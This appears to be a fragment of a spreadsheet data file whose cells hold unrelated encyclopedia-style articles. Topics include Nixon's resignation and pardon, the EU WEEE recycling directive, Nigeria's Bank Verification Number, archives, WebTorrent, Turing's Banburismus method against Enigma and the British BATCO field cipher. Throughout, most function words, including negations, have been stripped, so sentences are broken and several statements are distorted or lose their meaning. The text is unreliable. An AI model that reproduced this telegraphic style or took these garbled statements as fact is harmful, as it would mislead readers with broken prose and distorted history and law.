nixon support congress disappeared. rhodes told nixon would face certain impeachment articles came vote full house; indeed, estimate, representatives willing vote impeaching nixon obstructing justice. goldwater scott told president enough votes senate convict him, senators willing vote acquittal–not even half votes needed stay office. faced inevitability impeachment removal office public opinion turned decisively him, nixon decided resign. nationally televised address oval office evening august 1974, president said, part: decisions made public life, always tried best nation. throughout long difficult period watergate, felt duty persevere, make every possible effort complete term office elected past days, however, become evident longer strong enough political base congress justify continuing effort. long base, felt strongly necessary constitutional process conclusion, otherwise would unfaithful spirit deliberately difficult process dangerously destabilizing precedent future. would preferred carry finish whatever personal agony would involved, family unanimously urged interest nation must always come personal considerations. from discussions congressional leaders, concluded watergate matter might support congress would consider necessary back difficult decisions carry duties office interests nation would require. never quitter. leave office term completed abhorrent every instinct body. president, must interest america first. america needs full-time president full-time congress, particularly time problems face home abroad. continue fight months ahead personal vindication would almost totally absorb time attention president congress period entire focus great issues peace abroad prosperity without inflation home. therefore, shall resign presidency effective noon tomorrow. vice president ford sworn president hour office. morning resignation took effect, president, mrs. nixon family, said farewell white house staff east room. helicopter carried white house andrews force base maryland. nixon later wrote thought, helicopter moved andrews, found thinking past, future. what could now?" andrews, family boarded force plane toro marine corps station california, transported home casa pacifica clemente. president ford's pardon nixon with nixon's resignation, congress dropped impeachment proceedings. criminal prosecution still possibility federal level. nixon succeeded vice president gerald ford president, september 1974, issued full unconditional pardon nixon, immunizing prosecution crimes "committed committed taken part president. televised broadcast nation, ford explained felt pardon best interest country. said nixon family's situation american tragedy played part. could someone must write concluded that, can, must."nixon continued proclaim innocence death 1994. official response pardon, said "was wrong acting decisively forthrightly dealing watergate, particularly reached stage judicial proceedings grew political scandal national tragedy".some commentators argued pardoning nixon contributed president ford's loss presidential election 1976. allegations secret deal made ford, promising pardon return nixon's resignation, ford testify house judiciary committee october 1974.in autobiography time heal, ford wrote meeting nixon's chief staff, alexander haig. haig explaining nixon's staff thought nixon's options. could ride impeachment fight conviction senate way, could resign. options resigning delay resignation along impeachment process, settle censure vote congress, pardon resign. haig told ford nixon's staff suggested nixon could agree resign return agreement ford would pardon him. haig emphasized suggestions. identify staff members made clear recommending option another. what wanted know whether overall assessment situation agreed his. [emphasis original] next asked suggestions courses actions president. think would proper make recommendations all, told aftermath final legal actions effect profession charles colson pled guilty charges concerning daniel ellsberg case; exchange, indictment covering activities committee re-elect president dropped, strachan. remaining five members watergate seven indicted march went trial october 1974. january 1975, parkinson found guilty. 1976, u.s. court appeals ordered trial mardian; subsequently, charges dropped. haldeman, ehrlichman, mitchell exhausted appeals 1977. ehrlichman entered prison 1976, followed 1977. since nixon many senior officials involved watergate lawyers, scandal severely tarnished public image legal profession.the watergate scandal resulted government officials charged found guilty, including: john mitchell, attorney general united states resigned become director committee re-elect president, convicted perjury involvement watergate break-in. served months one- four-year sentence. richard kleindienst, attorney general united states, convicted "refusing answer questions" (contempt court); given month jail. stuart magruder, deputy director committee re</t>
  </si>
  <si>
    <t>Waste Electrical and Electronic Equipment Directive</t>
  </si>
  <si>
    <t>waste electrical electronic equipment directive (weee directive) european community directive 2012/19/eu waste electrical electronic equipment (weee) which, together rohs directive 2011/65/eu, became european february 2003. weee directive collection, recycling recovery targets types electrical goods, minimum rate kilograms head population annum recovered recycling 2009. rohs directive restrictions upon european manufacturers material content electronic equipment placed market. symbol adopted european council represent waste electrical electronic equipment comprises crossed-out wheelie without single black line underneath symbol. black line indicates goods placed market 2005, directive came force. goods without black line manufactured 2002 2005. instances, treated "historic weee" fall outside reimbursement producer compliance schemes. origins black line bar) stem directive 2012/19/eu referencing european standard 50419. this standard gives options marking equipment manufactured 13th august 2005, namely adding date manufacture label applying line/bar underneath logo. directive revisions directive undergone number minor revisions since inception 2002 (directive 2002/96/ec european parliament council january 2003). these include updates 2006 2009. after nine years directive seen failing achieve goals, hence legislation amended again. december 2011 european parliament european council agreed amendments directive, subject second-reading vote, taken january 2012. changes affect method calculating collection rates, previously (8.8 inhabitant year. provide transitional period seven years introduce revised method calculation, present method retained first four years time amended directive comes force. next three years, commencing fifth year amendment, calculation collection rates revised weight products entering market. once seven years transitional period over, member states individually select actual collection options wish use. overall recycle least electrical electronics waste equipment 2016. member state implementation directive imposes responsibility disposal waste electrical electronic equipment manufacturers distributors equipment. requires companies establish infrastructure collecting weee, "users electrical electronic equipment private households possibility returning weee least free charge". directive formation national "producer compliance schemes", manufacturers distributors paid annual collection recycling associated waste electronics household waste recycling centres. deadlines weee directive obliged twenty-five member states transpose provisions national august 2004. only cyprus deadline. august 2005, year deadline, member states except transposed least framework regulations. weee directive transposed 2006, active following year. categorisations weee directive places weee numerous categories, first tier historic non-historic. historic weee implies equipment placed market prior 2005 weee directive places onus upon owner equipment make provisions recycling. where equipment placed market 2005, known non-historic weee (denoted underneath crossed-out wheeled symbol), responsibility producer/distributor make provisions collection recycling. weee directive sets total categories weee reporting purposes. large household appliances small household appliances telecommunications equipment consumer equipment lighting equipment electrical electronic tools toys, leisure sports equipment medical devices monitoring control instruments automatic dispensers implementation prior implementation weee directive waste electronic electrical equipment disposed household (municipal) waste stream. post introduction hazardous waste regulations, exclusions apply electrical electronic equipment deemed hazardous. hazardous wastes derived (issued universal descriptor) european waste catalogue (known list wastes), denotes wastes digit number three sets two. hazardous wastes denoted asterisk number. hazardous electronic wastes comprise:uninterruptable power supplies, lead-acid batteries cathode tubes (televisions, computer monitors) fluorescent tubes, backlights laptop screens, thin-film transistors electrical/electronic equipment containing polychlorinated biphenyl (pcb) fridges freezers, chlorofluorocarbon (cfc), ozone-depleting substance. 2012 revisions regulations, refrigerants considered hazardous.weee delivered household waste recycling centres (hwrc), also known designated collection facilities (dcfs), collected delivered approved authorised treatment facilities (aatfs). waste electrical electronic equipment weighed categorised accordance directive. post re-processing (recycling), total volumes category reported producer compliance scheme reprocessor reimbursed accordingly. totals obligated weee aatfs collated environment agency quarterly basis reported historically, problems implementation producer compliance schemes "double counting" reporting reprocessed weee producer compliance schemes. this arose obligated weee partially treated first aatf receive waste, prior passed onto second aatf treatment. both first second aatf would claim waste electronics, resulting "net debt" wastes treated. additional legislation applies environmental protection (duty care) regulations 1991 hazardous waste regulations (england wales) 2005 waste framework directive, directive 2008/98/ecthe management weee applied waste hierarchy, particular emphasis upon reduction waste arising, re-use equipment recycling (recovery) materials: reduce, reuse, recycle. january 2012, proposals debated european parliament recast weee directive. proposals included increasing recycling rates. having adopted member states, re-drafted directive requires higher recovery rates capita annum opposed previous figures kilograms capita. public awareness april 2005 royal society arts conjunction canon) unveiled metre (23') tall sculpture titled weee london's south bank, made tonnes electrical goods—the average amount electrical waste individual creates lifetime. designed paul bonomini fabricated stage creative services. giant figure subsequently moved eden project cornwall part tour. also china rohs computer recycling cradle-to-cradle design digger gold eday electronic waste electronic waste country electronic waste recycling (disambiguation) green computing rohs rreuse references external links european commission weee page rohs directive weee directive www.weeelogic.com: weee compliance europe beyond (weee, battery, packaging) www.weeelogic.com ecosurety expert weee compliance support advice ec4p weee regulations countries waste electrical electronic equipment (weee), environment agency government) vca- enforcement body weee distributor obligations more weee electronics weekly weee forum</t>
  </si>
  <si>
    <t>Bank Verification Number</t>
  </si>
  <si>
    <t>bank verification number commonly called biometric identification system implemented central bank nigeria curb reduce illegal banking transactions nigeria. modern security measure line central bank nigeria 1958 reduce fraud banking system.the system works recording fingerprints facial photograph client. bank verification number 11-digit number unique individual, across bank institutions individual. operate banking account nigeria, must first bank verification number. once open first bank account, issued you. this remain used next need open bank account nigeria. thanks technology, easily check dialing ussd code asking bank provide information. there controversies security implication bank accounts different banks linked number, come stay. issues arose fraudsters attempted launch system phish customers' bank details. references</t>
  </si>
  <si>
    <t>Archive</t>
  </si>
  <si>
    <t>archive accumulation historical records materials medium physical facility located.archives contain primary source documents accumulated course individual organization's lifetime, kept show function person organization. professional archivists historians generally understand archives records naturally necessarily generated product regular legal, commercial, administrative, social activities. they metaphorically defined "the secretions organism", distinguished documents consciously written created communicate particular message posterity. general, archives consist records selected permanent long-term preservation grounds enduring cultural, historical, evidentiary value. archival records normally unpublished almost always unique, unlike books magazines many identical copies exist. this means archives quite distinct libraries regard functions organization, although archival collections often found within library buildings.a person works archives called archivist. study practice organizing, preserving, providing access information materials archives called archival science. physical place storage referred archive (more usual united kingdom), archives (more usual united states), repository.the computing term "archive" confused record-keeping meaning term. etymology english word archive derived french archives (plural), turn latin archīum archīvum, romanized form greek ἀρχεῖον (arkheion). greek term originally referred home dwelling archon, ruler chief magistrate, important official state documents filed interpreted; meaning broadened encompass concepts "town hall" "public records". root greek word ἀρχή (arkhē), meaning among things "magistracy, office, government", derived verb ἄρχω (arkhō), meaning begin, rule, govern" (also root english words "anarchy" "monarchy").the word archive first attested english early 17th century, word archivist 18th century, although periods terms usually found used reference foreign institutions personnel. late 19th century begin used widely domestic contexts.the adjective formed archive archival. history practice keeping official documents old. archaeologists discovered archives hundreds (and sometime thousands) clay tablets going back third second millennia sites like ebla, mari, amarna, hattusas, ugarit, pylos. these discoveries fundamental learning ancient alphabets, languages, literature, politics. archives well developed ancient chinese, ancient greeks, ancient romans (who called tabularia). however, archives lost, since documents written materials like papyrus paper deteriorated relatively quickly, unlike clay tablet counterparts. archives churches, kingdoms, cities middle ages survive often kept official status uninterruptedly present. they basic tool historical research period.england 1066 developed archives archival access methods. swiss developed archival systems 1450. first predecessors archival science west jacob rammingen's manuals 1571. baldassarre bonifacio's archivis libris singularis 1632.modern archival thinking roots dating back french revolution. french national archives, possess perhaps largest archival collection world (with records going back a.d.), created 1790 revolution various government, religious, private archives seized revolutionaries.in 1883 french archivist gabriel richou published first western text archival theory, entitled traité théorique pratique archives publiques (treaty theory practice public archives), systematized archival theory respect fonds, first published natalis wailly 1841. users institutions historians, genealogists, lawyers, demographers, filmmakers, others conduct research archives. research process archive unique, depends upon institution houses archive. while many kinds archives, recent census archivists united states identifies five major types: academic, business (for profit), government, non-profit, other. there also four main areas inquiry involved archives: material technologies, organizing principles, geographic locations, tangled embodiments humans non-humans. these areas help categorize kind archive created. academic archives colleges, universities, educational facilities typically housed within library, duties carried archivist. academic archives exist preserve institutional history serve academic community. academic archive contain materials institution's administrative records, personal professional papers former professors presidents, memorabilia related school organizations activities, items academic library wishes remain closed-stack setting, rare books thesis copies. access collections archives usually prior appointment only; posted hours making inquiries. users academic archives undergraduates, graduate students, faculty staff, scholarly researchers, general public. many academic archives work closely alumni relations departments campus institutions help raise funds library school. qualifications employment vary. entry-level positions usually require undergraduate diploma, typically archivists hold graduate degrees history library science (preferably certified body american library association). subject-area specialization becomes common higher ranking positions. business (for profit) archives located for-profit institutions usually owned private business. examples prominent business archives united states include coca-cola (which also owns separate museum world coca-cola), procter gamble, motorola heritage services archives, levi strauss these corporate archives maintain historic documents items related history administration companies. business archives serve purpose helping corporations maintain control brand retaining memories company's past. especially business archives, records management separate historic aspect archives. workers types archives combination training degrees, either history library background. these archives typically open public used workers owner company, though allow approved visitors appointment. business archives concerned maintaining integrity company, therefore selective materials used. government government archives include maintained local state government well maintained national federal) government. anyone government archive, frequent users include reporters, genealogists, writers, historians, students, people seeking information history home region. many government archives open public appointment required visit.in united states, national archives records administration (nara) maintains central archival facilities district columbia college park, maryland, regional facilities distributed throughout united states. some city local governments repositories, organization accessibility varies widely. similar library profession, certification requirements education also varies widely, state state. professional associations encourage need professionalize. nara offers certificate federal records management training program professional development. majority state local archives staff hold bachelor's degree—increasingly repositories list advanced degrees (e.g. mls/mlis, phd) certifications position requirement preference.in national archives (formerly known public record office) government archive england wales. physical records stored national archives amount (115 miles) shelving, number increases every year. english heritage archive public archive english heritage. national archives scotland, located edinburgh, serve country public record office northern ireland belfast government archive northern ireland. network county record offices local authority-run archives exists throughout england, wales, scotland holds many important collections, including local government, landed estates, church, business records. many archives contributed catalogues national "access archives" programme online searching across collections possible. france, french archives administration (service interministériel archives france) ministry culture supervises national archives (archives nationales), possess (232 miles) physical records 2020 (the total length occupied shelves next other), original records going back a.d. 625, 74.75 terabytes (74,750 electronic archives, well national overseas archives (anom, 36.5 kilometres (22.7 physical records), national archives world labour (anmt, 49.8 kilometres (30.9 physical records), local public archives (departmental archives, archives départementales, located préfectures départements france plus city paris, municipal archives larger towns cities france, newer regional archives) possess 3,591 (2,231 miles) physical records 225.25 terabytes electronic archives 2020). together, total volume archives supervision french archives administration largest world. archives french ministry armed forces (defence historical service, kilometres (280 physical records) archives french ministry foreign affairs (diplomatic archives kilometres physical records) managed separately respective ministries fall jurisdiction archives france administration.in india, national archives (nai) located delhi. taiwan, national archives administration located taipei.most intergovernmental organisations keep historical archives. however, number european organisations, including european commission, choose deposit archives european university institute florence. church prominent church archive vatican apostolic archive.archdioceses, dioceses, parishes also archives roman catholic anglican churches. very important monastery archives, antiquity, like ones monte cassino, saint gall, fulda. records archives include manuscripts, papal records, local church records, photographs, oral histories, audiovisual materials, architectural drawings. most protestant denominations archives well, including presbyterian historical society, moravian church archives, southern baptist historical library archives, united methodist archives history center united methodist church, christian church (disciples christ). films non-profit non-profit archives include historical societies, not-for-profit businesses hospitals, repositories within foundations. such repositories typically private funds donors preserve papers history specific persons places. these institutions rely grant funding government well private funds. depending availability funds, non-profit archives small historical society rural town state historical society rivals government archives. users type archive vary much institutions hold them. employees non-profit archives professional archivists, paraprofessionals, volunteers, education required position non-profit archive varies demands collection's user base. archiving archiving process collecting portions world wide ensuring collection preserved archive, archive site, future researchers, historians, public. massive size web, archivists typically employ crawlers automated collection. similarly, software code documentation archived web, example cpan. other some archives defy categorization. there tribal archives within native american nations north america, archives exist within papers private individuals. many museums keep archives order prove provenance pieces. institution persons wishing keep significant papers organized fashion employs basic principles archival science archive. 2004 census archivists taken united states, 2.7% archivists employed institutions defied categorization. this separate figure 1.3% identified self-employed.another type archive public secrets project. this interactive testimonial, women incarcerated california state prison system describe happened them. archive's mission gather stories women want express themselves, want stories heard. this collection includes transcripts audio recording women telling stories. archives individual include letters, papers, photographs, computer files, scrapbooks, financial records, diaries created collected individual regardless medium format. archives organization (such corporation government) tend contain types records, administrative files, business records, memos, official correspondence, meeting minutes. some archives made compilation types collections. example type combined compilation transgender archives university victoria contain multitude collections donations individuals organizations world. many donations cataloged, currently process digitally preserved made available public online.the arctic world archive commercially-run facility data preservation located svalbard archipelago, norway, contains data historical cultural interest several countries, well american multinational company github's open source code. data kept reels specially developed film steel vault buried deep beneath permafrost, data storage medium expected last 1000 years. standardization international council archives (ica) developed number standards archival description including general international standard archival description isad(g). isad(g) meant used conjunction national standards basis nations build standards. united states, isad(g) implemented describing archives: content standard, popularly known "dacs". canada, isad(g) implemented council archives rules archival description, also known "rad".iso currently working standards. protection cultural property stored archives threatened natural disasters, wars emergencies many countries. international partners archives unesco blue shield international accordance hague convention protection cultural property 1954 protocol 1999. from national international perspective, many collaborations archives local blue shield organizations ensure sustainable existence cultural property storage facilities. addition working united nations peacekeeping event war, protection archives requires creation strike lists", linking civil military structures training local personnel. limitations alternatives archives primarily contain physical artifacts printed documents increasingly shifting digitizing items originate digitally, usually stored away. this allows greater accessibility using search tools databases well increase availability digitized materials outside physical parameters archive; element loss disconnect gaps items made available digitally. both physical digital archives also generally specific limitations regarding types content deemed able preserved, categorized, archived. conventional institutionalized archive spaces tendency prioritize tangible items ephemeral experiences, actions, effects, even bodies. this type potentially biased prioritization seen form privileging particular types knowledge interpreting certain experiences valid others, limiting content available archive users, leading barriers accessing information potentially alienation under-represented and/or marginalized populations epistemologies ontologies.as result perceived under-representation, activists making efforts decolonize contemporary archival institutions employ hegemonic white supremacist practices implementing subversive alternatives anarchiving counter-archiving intention making intersectional accessibility priority cannot want access contemporary archival institutions. example morgan page’s description disseminating transgender history directly trans people various social media networking platforms like tumblr, twitter, instagram, well podcast. while majority archived materials typically well conserved within collections, anarchiving’s attention ephemerality also brings light inherent impermanence gradual change physical objects time result handled.the concept counter-archiving brings question tends considered archivable therefore selected preserved within conventional contemporary archives. with options available counter-archiving, potential "challenge traditional conceptions history" perceived within contemporary archives, creates space narratives often present many archival materials. unconventional nature counter-archiving practices makes room maintaining ephemeral qualities contained within certain historically significant experiences, performances, personally culturally relevant stories typically space conventional archives.the practices anarchiving counter-archiving rooted social justice work. also references external links international council archives archives search across descriptions archives held institutions across interpares project international research project long-term preservation authentic digital records access archives (a2a) english strand archives network online-guide archives around globe aim25 archives within area. british cartoon archive philanthropy archive associated university kent digital archive literacy narratives banco giorgio genova italy: archive (1407–1805): nearly 40,000 books catalogued full description. www.giuseppefelloni.it slavic archives inter-university consortium political social research (icpsr) united nations archives</t>
  </si>
  <si>
    <t>WebTorrent</t>
  </si>
  <si>
    <t>webtorrent peer-to-peer (p2p) streaming torrent client written javascript, author, feross aboukhadijeh, youtube instant, team webtorrent github, browsers, well webtorrent desktop stand alone version able bridge webtorrent bittorrent serverless networks. history before creating webtorrent, developers first created peercdn, peer-to-peer content delivery network bought yahoo! 2013. idea behind webtorrent make bittorrent-like protocol works browser, maintaining much compatibility bittorrent possible. browser able connect peer-to-peer swarm, fetch content, verify correct, display user much possible without centralized servers relying network entirely people's browsers. webtorrent uses protocol bittorrent uses different transport layer. webtorrent primarily relies webrtc connections, bittorrent uses connections datagrams directly. webtorrent desktop webtorrent desktop bridges networks webrtc-based webtorrent tcp/udp-based bittorrent simultaneously. bittorrent client vuze (formerly azureus) less gracefully adequately functionally incorporated webtorrent adding simultaneous network bridging software. developers used electron makes desktop apps using javascript access apis chrome node. functionality online video core focus webtorrent useful. less suited smaller files data sets ideal larger files.file availability, bittorrents, dependent torrent seeding. users sharing file http server providing webseeding would fall back. there sharing without webseeding. however, could positive implications. rather using middleman upload site share large private file another person, webtorrent directly connect without leaving traces somewhere potentially archived upload site. simply drag drop file create magnet link share friend. connections already encrypted extra layers encryption keys send another way. limits managed indexeddb. adoption webtorrent uses widely supported open standards like webrtc therefore works modern browser, including google chrome, firefox, opera desktop android, microsoft edge safari. bitchute launched 2017, bitchute video hosting service used webtorrent technology. claimed order ease bandwidth issues centralized streaming. according fredrick brennan, little evidence bitchute actually uses peer-to-peer technology. april 2021, option host videos using webtorrent bitchute "appears deprecated", according technica. brave brave browser bundles webtorrent native executables integrates webtorrent also bitchute, formerly used webtorrent peertube, uses webtorrent libtorrent, implements webtorrent comparison bittorrent clients interplanetary file system list video hosting services dailymotion vidme vimeo youtube youtube instant references external links official website webtorrent.io instant.io webtorrent magnets. demuxed webtorrent: bringing bittorrent youtube, 2017-07-06, audio interview (not video) starts excellent introduction webtorrent, drifts past projects context, gets technical hacking streams, concluding vacuum frying banana chips.</t>
  </si>
  <si>
    <t>Banburismus</t>
  </si>
  <si>
    <t>banburismus cryptanalytic process developed alan turing bletchley park britain second world war. used bletchley park's help break german kriegsmarine (naval) messages enciphered enigma machines. process used sequential conditional probability infer information likely settings enigma machine. gave rise turing's invention measure weight evidence favour hypothesis. this concept later applied turingery methods used breaking lorenz cipher. overview banburismus reduce time required electromechanical bombe machines identifying likely right-hand middle wheels enigma. performed procedure continuously years, stopping 1943 sufficient bombe time became readily available. banburismus development "clock method" invented polish cryptanalyst jerzy różycki.hugh alexander regarded best banburists. good considered process intellectual game job. "not easy enough trivial, difficult enough cause nervous breakdown". history first months arriving bletchley park september 1939, alan turing correctly deduced message-settings kriegsmarine enigma signals enciphered common grundstellung (starting position rotors), super-enciphered bigram trigram lookup table. these trigram tables book called kenngruppenbuch book). however, without bigram tables, unable start attacking traffic. breakthrough achieved narvik pinch disguised armed trawler polares, narvik norway, seized griffin north april 1940. germans time destroy cryptographic documents, captured material revealed precise form indicating system, supplied plugboard connections grundstellung april operators' log, gave long stretch paired plaintext enciphered message 25th 26th.the bigram tables part capture, able settings-lists read retrospectively, kriegsmarine traffic intercepted april. this allowed partial reconstruction bigram tables start first attempt banburismus attack kriegsmarine traffic, april onwards. eligible days least messages received partial bigram-tables deciphered indicators. first broken 1940, thereafter celebrated "foss's day" honour hugh foss, cryptanalyst achieved feat. this task took november year, time intelligence date, show banburismus could work. also allowed much bigram tables reconstructed, turn allowed april june broken. however, kriegsmarine changed bigram tables july. 1940, much theory banburismus scoring system worked out. first lofoten pinch trawler krebs march 1941 provided complete keys february bigram tables book. consequent decrypts allowed statistical scoring system refined banburismus could become standard procedure kriegsmarine enigma mid-1943. principles banburismus utilised weakness indicator procedure (the encrypted message settings) kriegsmarine enigma traffic. unlike german army airforce enigma procedures, kriegsmarine used grundstellung provided lists, messages particular pair days). this meant three-letter indicators enciphered rotor settings depth other. normally, indicators messages never same, could happen that, part-way message, rotor positions became starting position rotors another message, parts messages overlapped depth. principle behind banburismus relatively simple (and seems rather similar index coincidence). sentences english german written other, count made often letter message corresponding letter message; matches would occur sentences random strings letters. random sequence, repeat rate single letters expected (around 3.8%), german navy messages shown (5.9%). messages depth, matches occur plaintexts. however, messages depth, ciphertexts compare random, giving repeat rate this allows attacker take messages whose indicators differ third character, slide looking giveaway repeat pattern shows align depth. comparison messages look repeats made easier punching messages onto thin cards high (10") several metres wide (they different cards different lengths message). hole column card represented position, hole bottom represented 'z'. message-cards laid light-box light shone through, repeat. this made much simpler detect count repeats. cards printed banbury oxfordshire. they became known 'banburies' bletchley park, hence procedure using them: banburismus.the application scritchmus procedure (see below) gives clue possible right-hand rotor. example message indicator "vfg": xcybgdslvwbdjlkwipehvygqzwdthrqxikeesqsspzxarixeabqiruckhgwuebpf message indicator "vfx": ynscfccpvipemsgizwflhesciyspvrxmcfqaxvxdvuqilbjuabnlkmkdjmenunq would punch onto banburies count repeats valid offsets letters letters. there promising positions: xcybgdslvwbdjlkwipehvygqzwdthrqxikeesqsspzxarixeabqiruckhgwuebpf ynscfccpvipemsgizwflhesciyspvrxmcfqaxvxdvuqilbjuabnlkmkdjmenunq this offset eight letters shows nine repeats, including bigrams, overlap letters (16%). promising position looks like this: xcybgdslvwbdjlkwipehvygqzwdthrqxikeesqsspzxarixeabqiruckhgwuebpf ynscfccpvipemsgizwflhesciyspvrxmcfqaxvxdvuqilbjuabnlkmkdjmenunq this offset seven shows single trigram overlap letters. turing's method accumulating score number decibans allows calculation situations likely represent messages depth. might expected, former winner odds latter on.turing calculated scores number single repeats overlaps many letters, number bigrams trigrams. tetragrams often represented german word plaintext scores calculated according type message (from traffic analysis), even position within message. these tabulated relevant values summed banburists assessing pairs messages likely depth. bletchley park used convention indicator plaintext "vfx", eight characters ahead "vfg", terms third, differing, letter) g+8". scritchmus scritchmus part banburismus procedure could lead identification right-hand (fast) wheel. banburist might evidence various message-pairs (with third indicator letter differing) showing q−2", x−4" g+3". would search deciban sheets distances odds better (i.e. scores +34). attempt made construct 'end wheel alphabet' forming 'chains' end-wheel letters repeats. they could construct "chain" follows: g--b-h---x-q compared progressive offsets known letter-sequence enigma rotor, quite possibilities discounted violating either "reciprocal" property "no-self-ciphering" property enigma machine: g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... possible g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible apparently enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible apparently enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible apparently enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... possible g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... possible g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... possible g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers g--b-h---x-&gt; abcdefghijklmnopqrstuvwxyz ......... possible g--b-h---x-&gt; abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers g--b-h---&gt; abcdefghijklmnopqrstuvwxyz ......... possible -x-q g--b-h--&gt; abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers --x-q g--b-h-&gt; abcdefghijklmnopqrstuvwxyz ......... possible ---x-q g--b-h-&gt; abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers h---x-q g--b-&gt; abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers -h---x-q g--b-&gt; abcdefghijklmnopqrstuvwxyz ......... impossible enciphers enciphers b-h---x-q g--&gt; abcdefghijklmnopqrstuvwxyz ......... possible (note enciphers enciphers property) -b-h---x-q abcdefghijklmnopqrstuvwxyz ......... impossible enciphers --b-h---x-q abcdefghijklmnopqrstuvwxyz ......... possible so-called "end-wheel alphabet" already limited nine possibilities, merely establishing letter-chain five letters derived mere four message-pairs. would fitting letter-chains ones letters common first chain nine candidate end-wheel alphabets. eventually hope left candidate, maybe looking like this: f----a--d---o --x-q g--b-h-&gt; abcdefghijklmnopqrstuvwxyz this, end-wheel alphabet forces conclusion wheel fact "rotor this "rotor would caused mid-wheel turnover stepped "f", that's middle span letter-chain "f----a--d---o". likewise, possible mid-wheel turnovers precluded. rotor turnover "r", that's part alphabet spanned chain. that different enigma wheels different turnover points was, presumably, measure designers machine improve security. however, complication allowed bletchley park deduce identity wheel. middle wheel once wheel identified, principles extended handle middle rotor, though added complexity search overlaps message-pairs sharing first indicator letter, overlaps could therefore occur characters apart.the workload beyond manual labour, punched messages onto 80-column cards used hollerith machines scan tetragram repeats better. that told banburies light boxes (and overlap) evaluate whole repeat pattern. armed probable mid-wheel overlaps, could compose letter-chains middle wheel much illustrated wheel. that turn (after scritchmus) would give least partial middle wheel alphabet, hopefully least possible choices rotor middle wheel could eliminated turnover knowledge done identifying wheel). taken together, probable right hand middle wheels would give bombe runs day, would significantly reduced possible. also sequential analysis references bibliography alexander, hugh o'd. 1945), cryptographic history work german naval enigma, national archives, kew, reference 25/1 good, jack (1993), "enigma fish", hinsley, f.h.; stripp, alan (eds.), codebreakers: inside story bletchley park, oxford: oxford university press, isbn 978-0-19-280132-6 hosgood, steven (2008). "all ever wanted know about banburismus afraid ask". archived original march 2016. retrieved march 2016. mackay, david information theory, inference, learning algorithms cambridge: cambridge university press, 2003. isbn 0-521-64298-1. this on-line textbook includes chapter discussing information theory aspects banburismus. mahon, a.p. (1945). "the history eight 1939 1945". retrieved october 2009. further reading sebag-montefiore, hugh. enigma battle code. cassell military paperbacks, london, 2004. isbn 978-1-4072-2129-8 external links 1944 bletchley park cryptographic dictionary "all ever wanted know about banburismus afraid ask" whole procedure researched detail, worked example.</t>
  </si>
  <si>
    <t>BATCO</t>
  </si>
  <si>
    <t>batco, short battle code, hand-held, paper-based encryption system used low, front line (platoon, troop section) level british army. introduced along clansman combat radio early 1980s largely obsolete 2010 wide deployment secure bowman radios. batco consists code, contained vocabulary cards, cipher sheets superencryption numeric code words. cipher sheets, typically changed daily, also include authentication table radio call sign protection system. batco similar older slidex system. batco still taught royal signals communication systems operators back-up secure equipment fail unavailable. also taught army cadets combined cadets part signal classification qualification. code messages batco first encoded numbers using several vocabulary cards. batco cipher used encrypt numbers letters, transmitted unsecure channels. process reversed receiving end. each batco vocabulary card groups words needed particular function, card changes infrequent. every vocabulary word card assigned digit code. some vocabulary card entries call fixed number digits digit code. example, code (estimated time arrival) followed four digit time day. each card three digit number always code word card means switch card number xxx. cipher each batco cipher sheet composed double-sided sheet size fits specially made batco wallet. each single side usually valid hours. wallet slide aids reading tables correctly. plaintext character batco consists symbols, digits decimal point "change" character denoted batco ciphertext character letters batco also used transmit numeric information, grid coordinates. switching mode accomplished sending vocabulary code appropriate proword, figures grid. decimal point plaintext character used needed numeric mode, normal meaning. symbol used mark numeric string transmission, returning vocabulary card codes. main batco cipher table matrix columns rows. columns divided groups. seven left columns numbered column digit contains randomly scrambled alphabet. right columns labeled ".", i.e. plaintext symbols repeated. each right columns contains scrambled alphabet, letters cell. (there columns, letters cell exhausts alphabet.) traffic consist digit (from letter. operator selects first columns using digit finds letter occurs. that second columns used encipher decipher batco messages. scrambled alphabet selected defines correspondence plaintext symbols column headings ciphertext symbols individual cells. note possible ciphertexts plaintext symbol, except four possible ciphertexts. batco users instructed choose different ciphertext symbols plaintext symbol repeats message. security maintained frequent changes. batco instructions require every message symbols encoded single key. keys rotated alphabetical order, would followed column kept reserve emergencies. other functions addition cipher, batco sheet spelling authentication table callsign indicator chartthe spelling converts letters digit numbers encoded using procedure described above. used special situations spell words sensitive vocabulary cards. spelling column matrix labeled horizontally vertically single digits. matrix contains scrambled alphabet four blank cells. authentication table converts digit challenge number digit response. grid, also labeled horizontally vertically single digits. each cell contains random digit number, repeated cells. challenge issued digit number specifying columns selects cell table. response contents cell. final scrambled alphabet bottom cipher sheet used call sign scrambling system. also dryad similar paper based tactical cipher used united states military references photographs description slidex</t>
  </si>
  <si>
    <t>BBC News</t>
  </si>
  <si>
